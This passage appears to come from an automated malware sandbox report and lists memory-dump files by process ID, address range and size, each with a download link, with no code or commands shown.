16KB

Download
memory/1160-158-0x0000000000000000-mapping.dmp

Download
memory/1160-185-0x0000000000920000-0x0000000000924000-memory.dmp

Filesize
16KB

Download
memory/1180-474-0x0000000000000000-mapping.dmp

Download
memory/1192-198-0x0000000000000000-mapping.dmp

Download
memory/1204-323-0x0000000000000000-mapping.dmp

Download
memory/1236-254-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1236-317-0x000002753C6B0000-0x000002753C6D7000-memory.dmp

Filesize
156KB

Download
memory/1244-255-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1244-318-0x000001B53FFD0000-0x000001B53FFF7000-memory.dmp

Filesize
156KB

Download
memory/1252-262-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1320-209-0x0000000000000000-mapping.dmp

Download
memory/1328-170-0x0000000000EF0000-0x0000000000EFB000-memory.dmp

Filesize
44KB

Download
memory/1328-167-0x0000000000000000-mapping.dmp

Download
memory/1328-175-0x0000000000F00000-0x0000000000F06000-memory.dmp

Filesize
24KB

Download
memory/1328-188-0x0000000000F00000-0x0000000000F06000-memory.dmp

Filesize
24KB

Download
memory/1368-265-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1380-495-0x0000000000000000-mapping.dmp

Download
memory/1384-266-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1408-211-0x0000000000000000-mapping.dmp

Download
memory/1436-267-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1444-282-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1460-269-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1516-490-0x0000000000000000-mapping.dmp

Download
memory/1552-268-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1608-270-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1624-210-0x0000000000000000-mapping.dmp

Download
memory/1664-271-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1672-272-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1692-275-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1760-503-0x0000000000000000-mapping.dmp

Download
memory/1792-276-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1832-277-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1892-278-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1912-279-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1944-515-0x0000000000000000-mapping.dmp

Download
memory/1944-274-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1952-280-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1980-174-0x0000000000420000-0x0000000000429000-memory.dmp

Filesize
36KB

Download
memory/1980-163-0x0000000000000000-mapping.dmp

Download
memory/1980-169-0x0000000000410000-0x000000000041F000-memory.dmp

Filesize
60KB

Download
memory/1980-187-0x0000000000420000-0x0000000000429000-memory.dmp

Filesize
36KB

Download
memory/1996-264-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2016-281-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2096-238-0x0000000003EE0000-0x0000000003EFE000-memory.dmp

Filesize
120KB

Download
memory/2096-225-0x0000000001840000-0x0000000001876000-memory.dmp

Filesize
216KB

Download
memory/2096-230-0x0000000004280000-0x00000000048A8000-memory.dmp

Filesize
6.2MB

Download
memory/2096-233-0x00000000049B0000-0x0000000004A16000-memory.dmp

Filesize
408KB

Download
memory/2096-232-0x00000000041B0000-0x00000000041D2000-memory.dmp

Filesize
136KB

Download
memory/2096-234-0x0000000004A20000-0x0000000004A86000-memory.dmp

Filesize
408KB

Download
memory/2120-283-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2128-206-0x0000000000000000-mapping.dmp

Download
memory/2132-284-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2328-488-0x0000000000000000-mapping.dmp

Download
memory/2344-224-0x0000000000000000-mapping.dmp

Download
memory/2360-285-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2384-286-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2440-287-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2456-288-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2508-289-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2560-290-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2580-291-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/2624-218-0x00007FF7EB161938-mapping.dmp

Download
memory/2648-467-0x0000000000000000-mapping.dmp

Download
memory/2720-497-0x0000000000000000-mapping.dmp

Download
memory/2728-409-0x0000000000000000-mapping.dmp

Download
memory/2740-437-0x0000000000000000-mapping.dmp

Download
memory/2772-203-0x0000000000000000-mapping.dmp

Download
memory/2972-207-0x0000000000000000-mapping.dmp

Download
memory/3112-459-0x0000000000000000-mapping.dmp

Download
memory/3144-208-0x0000000000000000-mapping.dmp

Download
memory/3164-204-0x0000000000000000-mapping.dmp

Download
memory/3176-229-0x00007FF87D670000-0x00007FF87E131000-memory.dmp

Filesize
10.8MB

Download
memory/3176-249-0x00007FF89C070000-0x00007FF89C12E000-memory.dmp

Filesize
760KB

Download
memory/3176-248-0x00007FF89CA50000-0x00007FF89CC45000-memory.dmp

Filesize
2.0MB

Download
memory/3176-240-0x00007FF89CA50000-0x00007FF89CC45000-memory.dmp

Filesize
2.0MB

Download
memory/3176-241-0x00007FF89C070000-0x00007FF89C12E000-memory.dmp

Filesize
760KB

Download
memory/3240-347-0x0000000000000000-mapping.dmp

Download
memory/3280-518-0x0000000000000000-mapping.dmp

Download
memory/3336-213-0x0000000000000000-mapping.dmp

Download
memory/3444-202-0x0000000000000000-mapping.dmp

Download
memory/3532-152-0x0000000140000000-0x0000000141190000-memory.dmp

Filesize
17.6MB

Download
memory/3532-147-0x0000000000000000-mapping.dmp

Download
memory/3532-183-0x0000000140000000-0x0000000141190000-memory.dmp

Filesize
17.6MB

Download
memory/3532-219-0x0000000140000000-0x0000000141190000-memory.dmp

Filesize
17.6MB

Download
memory/3544-524-0x0000000000000000-mapping.dmp

Download
memory/3612-200-0x0000000000000000-mapping.dmp

Download
memory/3648-178-0x0000000000000000-mapping.dmp

Download
memory/3648-181-0x0000000000BD0000-0x0000000000BDB000-memory.dmp

Filesize
44KB

Download
memory/3648-179-0x0000000000BE0000-0x0000000000BE8000-memory.dmp

Filesize
32KB

Download
memory/3648-190-0x0000000000BE0000-0x0000000000BE8000-memory.dmp

Filesize
32KB

Download
memory/3652-189-0x0000000000770000-0x0000000000777000-memory.dmp

Filesize
28KB

Download
memory/3652-173-0x0000000000000000-mapping.dmp

Download
memory/3652-176-0x0000000000770000-0x0000000000777000-memory.dmp

Filesize
28KB

Download
memory/3652-177-0x0000000000760000-0x000000000076D000-memory.dmp

Filesize
52KB

Download
memory/3756-214-0x0000000000000000-mapping.dmp

Download
memory/3856-343-0x0000000000000000-mapping.dmp

Download
memory/4220-326-0x0000000000000000-mapping.dmp

Download
memory/4300-201-0x0000000000000000-mapping.dmp

Download
memory/4420-501-0x0000000000000000-mapping.dmp

Download
memory/4532-227-0x00007FF87D670000-0x00007FF87E131000-memory.dmp

Filesize
10.8MB

Download
memory/4532-221-0x00007FF87D670000-0x00007FF87E131000-memory.dmp

Filesize
10.8MB

Download
memory/4560-510-0x0000000000000000-mapping.dmp

Download
memory/4680-192-0x00000000105A0000-0x0000000010649000-memory.dmp

Filesize
676KB

Download
memory/4680-194-0x0000000010590000-0x0000000010595000-memory.dmp

Filesize
20KB

Download
memory/4680-193-0x00000000105A0000-0x0000000010649000-memory.dmp

Filesize
676KB

Download
memory/4680-184-0x0000000002773000-0x0000000002BCA000-memory.dmp

Filesize
4.3MB

Download
memory/4680-154-0x0000000002773000-0x0000000002BCA000-memory.dmp

Filesize
4.3MB

Download
memory/4680-182-0x0000000002BD9000-0x0000000002CB3000-memory.dmp

Filesize
872KB

Download
memory/4680-195-0x0000000010590000-0x0000000010595000-memory.dmp

Filesize
20KB

Download
memory/4680-150-0x0000000000000000-mapping.dmp

Download
memory/4680-196-0x00000000058F0000-0x0000000005E94000-memory.dmp

Filesize
5.6MB

Download
memory/4680-191-0x0000000002BD9000-0x0000000002CB3000-memory.dmp

Filesize
872KB

Download
memory/4680-199-0x0000000002BD9000-0x0000000002CB3000-memory.dmp

Filesize
872KB

Download
memory/4756-448-0x0000000000000000-mapping.dmp

Download
memory/5000-212-0x00007FF87D670000-0x00007FF87E131000-memory.dmp

Filesize
10.8MB

Download
memory/5000-205-0x00000194D10C0000-0x00000194D10E2000-memory.dmp

Filesize
136KB

Download
memory/5000-217-0x00007FF87D670000-0x00007FF87E131000-memory.dmp

Filesize
10.8MB

Download
memory/5004-222-0x0000000000000000-mapping.dmp

Download
memory/5016-138-0x0000000000200000-0x0000000000243000-memory.dmp

Filesize
268KB

Download
memory/5016-144-0x0000000002A76000-0x0000000002BA4000-memory.dmp

Filesize
1.2MB

Download
memory/5016-136-0x0000000011920000-0x0000000011C38000-memory.dmp

Filesize
3.1MB

Download
memory/5016-145-0x00000000770F0000-0x0000000077293000-memory.dmp

Filesize
1.6MB

Download
memory/5016-135-0x00000000770F0000-0x0000000077293000-memory.dmp

Filesize
1.6MB

Download
memory/5016-134-0x0000000002A76000-0x0000000002BA4000-memory.dmp

Filesize
1.2MB

Download
memory/5016-146-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5016-137-0x0000000011920000-0x0000000011C38000-memory.dmp

Filesize
3.1MB

Download
memory/5016-142-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5016-132-0x0000000002C0F000-0x0000000003203000-memory.dmp

Filesize
6.0MB

Download
memory/5016-143-0x0000000002C0F000-0x0000000003203000-memory.dmp

Filesize
6.0MB

Download
memory/5016-133-0x00000000770F0000-0x0000000077293000-memory.dmp

Filesize
1.6MB

Download
memory/5028-405-0x0000000000000000-mapping.dmp

Download
memory/5032-506-0x0000000000000000-mapping.dmp

Download
memory/5088-239-0x00000000030E0000-0x0000000003537000-memory.dmp

Filesize
4.3MB

Download